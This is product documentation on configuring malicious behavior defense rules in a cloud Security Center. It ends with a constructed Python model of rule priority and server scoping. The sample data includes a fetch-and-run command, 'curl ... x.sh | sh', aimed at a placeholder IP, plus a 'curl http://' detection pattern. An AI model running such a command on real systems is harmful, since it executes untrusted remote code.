Security Center provides the malicious behavior defense feature. You can enable or disable a system defense rule, manage the servers on which you want the system defense rule to take effect, and configure custom defense rules based on your business requirements. This topic describes how to use the malicious behavior defense feature.

Limits

Only the Advanced, Enterprise, and Ultimate editions of Security Center support this feature. For more information about how to purchase and upgrade Security Center, see Purchase Security Center and Upgrade and downgrade Security Center.

Scenarios

The malicious behavior defense feature supports system defense rules and custom defense rules. The following table describes the scenarios for which the two types of rules are suitable.

Important Custom defense rules have a higher priority than system defense rules.

System defense rule
  • Use system defense rules that are suitable for your business scenarios

    If a system defense rule is not suitable for your business scenarios and affects the security score of your servers, you can disable the rule. For more information, see Manage system defense rules.

  • Handle alert events that are false positives

    If you handle an alert event whose alert type is Precise defense and you determine that the processes detected and reported by Security Center based on a system defense rule are normal processes that are required for your workloads, you can disable the rule on the Host defense rules tab of the Malicious Behavior Defense page. You can also remove the affected servers from the list of servers on which the rule takes effect. For more information, see Handle alert events that are false positives.

Custom defense rule
  • Allow behavior that a system defense rule would otherwise report

    If you want to allow some behavior after you enable or disable a system defense rule, you can create a custom defense rule based on your business requirements.

Manage system defense rules

  1. Log on to the Security Center console. In the left-side navigation pane, choose Protection Configuration > Host Protection > Malicious Behavior Defense.
  2. On the Host defense rules tab, find and manage a system defense rule in the list of system defense rules.

    Search for a system defense rule

    • On the Host defense rules tab, enter the name of the system defense rule in the search box to quickly search for the rule.
    • In the left-side navigation pane of the Host defense rules tab, click a value in the ATT&CK Phase section to filter for the rule.

    Manage a system defense rule

    • Enable or disable the system defense rule
      Important After you disable a system defense rule, Security Center no longer detects risks or triggers alerts based on the rule. The alert events that are generated based on the rule are no longer displayed on the Alerts page. Proceed with caution.
      1. Select the system defense rule. You can also select multiple rules based on your business requirements.
      2. In the lower-left corner of the rule list, click Enabled or Deactivation.
    • Manage servers on which the system defense rule takes effect
      Important After you remove a server from a system defense rule, Security Center no longer detects or reports risks on the server based on the rule. Proceed with caution.
      1. Find the system defense rule that you want to manage and click Management host in the Actions column.
      2. In the Management host panel, add servers to the rule or remove servers from the rule. Then, click OK.

Handle alert events that are false positives

  1. Log on to the Security Center console. In the left-side navigation pane, choose Detection and Response > Alerts.
  2. On the Alerts page, click the number that is displayed below Precise Defense.
  3. In the alert event list, find the alert event that is a false positive and click Details in the Actions column to view the details about the alert event.

    In this example, the alert event that is generated for the alert named Suspicious worm script behavior is handled.

    In the alert details panel, obtain and record the following information for subsequent use.
    • The name of the system defense rule that detects risks. The alert event is generated for the detected risks. In this example, the system defense rule is Suspicious worm script behavior.
    • The value of ATT&CK Phase for the alert event. In this example, the value is Impact.
    • The names and IP addresses of the servers that are affected by the alert event.
  4. In the left-side navigation pane, click Malicious Behavior Defense.
  5. On the Host defense rules tab, search for the system defense rule based on which the alert event is generated.
    • You can enter Suspicious worm script behavior in the search box.
    • You can also click Impact in the ATT&CK Phase section in the left-side navigation pane of the Host defense rules tab.
  6. In the rule list, find and manage the system defense rule Suspicious worm script behavior.
    • If the system defense rule is not suitable for your business scenario and you no longer want Security Center to generate alert events for the risks that are detected by the system defense rule, you can click the Switch icon in the Switch column to disable the rule.
      Important After you disable a system defense rule, Security Center no longer detects risks or generates alert events based on the rule. The alert events that are generated based on the rule are no longer displayed on the Alerts page. Proceed with caution.
    • If you want to handle only an alert event that is a false positive, you can click Management host in the Actions column to remove the servers that are affected from the server list of the rule.

      You can also find and handle an alert event that is a false positive on the Alerts page. For more information, see View and handle alert events.

      Important If you want to handle only an alert event that is generated based on a system defense rule and you want the system defense rule to continue to protect the server on which you handle the alert event, you can add the server to the server list on the Malicious Behavior Defense page after you handle the alert event.

Create a custom defense rule

  1. Log on to the Security Center console. In the left-side navigation pane, choose Protection Configuration > Host Protection > Malicious Behavior Defense.
  2. On the Custom defense rules tab, click New rule.
  3. In the New rule panel, configure the Rule type parameter, the required parameters, and the Action parameter based on your business requirements. Then, click Next.
  4. In the server list of the panel, select the servers on which you want the rule to take effect and click Finish.
    By default, a newly created custom defense rule is enabled. You can modify the rule and manage the servers on which the rule takes effect.
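The following is an added illustration, not code from Security Center or Alibaba Cloud, that models the three behaviors this topic describes: a custom defense rule is evaluated before any system defense rule, a disabled rule no longer detects or alerts, and a rule ignores servers that were removed from its server list. The rule structure, the substring matching, the server names, the command lines, and the custom rule named "Allow deploy script (hypothetical)" are all constructed assumptions; only the system rule name "Suspicious worm script behavior" comes from this topic. The real product's rule parameters and matching logic are not documented here, so treat this as a model of the precedence and scoping semantics, not of the engine itself.

```python
from dataclasses import dataclass


@dataclass
class DefenseRule:
    # Constructed model of a defense rule; field semantics are assumptions.
    name: str
    rule_type: str   # "custom" or "system"
    enabled: bool
    servers: set     # servers on which the rule takes effect
    action: str      # "alert" (report the behavior) or "allow" (permit it)
    pattern: str     # assumed matcher: substring of the process command line


def evaluate(rules, server, command_line):
    """Return (rule name, action) for the first rule that matches, or (None, "none").

    Custom rules are evaluated before system rules, which models the stated
    priority of custom defense rules over system defense rules.
    """
    ordered = sorted(rules, key=lambda r: 0 if r.rule_type == "custom" else 1)
    for rule in ordered:
        if not rule.enabled:
            continue  # a disabled rule detects nothing and raises no alert
        if server not in rule.servers:
            continue  # a server removed from the rule is no longer covered by it
        if rule.pattern in command_line:
            return rule.name, rule.action
    return None, "none"


def disable_rule(rules, name):
    """Model of switching a rule off on the Host defense rules tab."""
    for rule in rules:
        if rule.name == name:
            rule.enabled = False


def remove_server(rules, name, server):
    """Model of removing a server from a rule in the Management host panel."""
    for rule in rules:
        if rule.name == name:
            rule.servers.discard(server)


def sample_rules():
    # Constructed sample: one system rule (name taken from this topic) and one
    # hypothetical custom rule that allows a known deployment script on web-01.
    return [
        DefenseRule("Suspicious worm script behavior", "system", True,
                    {"web-01", "web-02"}, "alert", "curl http://"),
        DefenseRule("Allow deploy script (hypothetical)", "custom", True,
                    {"web-01"}, "allow", "curl http://deploy.internal"),
    ]


if __name__ == "__main__":
    rules = sample_rules()
    deploy = "sh -c 'curl http://deploy.internal/run.sh | sh'"
    unknown = "sh -c 'curl http://198.51.100.7/x.sh | sh'"  # constructed sample
    print(evaluate(rules, "web-01", deploy))   # custom allow rule wins on web-01
    print(evaluate(rules, "web-02", deploy))   # web-02 is outside the custom rule
    print(evaluate(rules, "web-01", unknown))  # custom rule does not match, alert
    remove_server(rules, "Suspicious worm script behavior", "web-02")
    print(evaluate(rules, "web-02", unknown))  # web-02 no longer covered
    disable_rule(rules, "Suspicious worm script behavior")
    print(evaluate(rules, "web-01", unknown))  # rule disabled, nothing reported
```

The model makes the trade-off in the Important notes above concrete: removing one server from a system rule silences that rule only on that server, while disabling the rule silences it everywhere, so scoping a narrow custom allow rule to the affected servers is the change that keeps the system rule active for everything it does not explicitly permit.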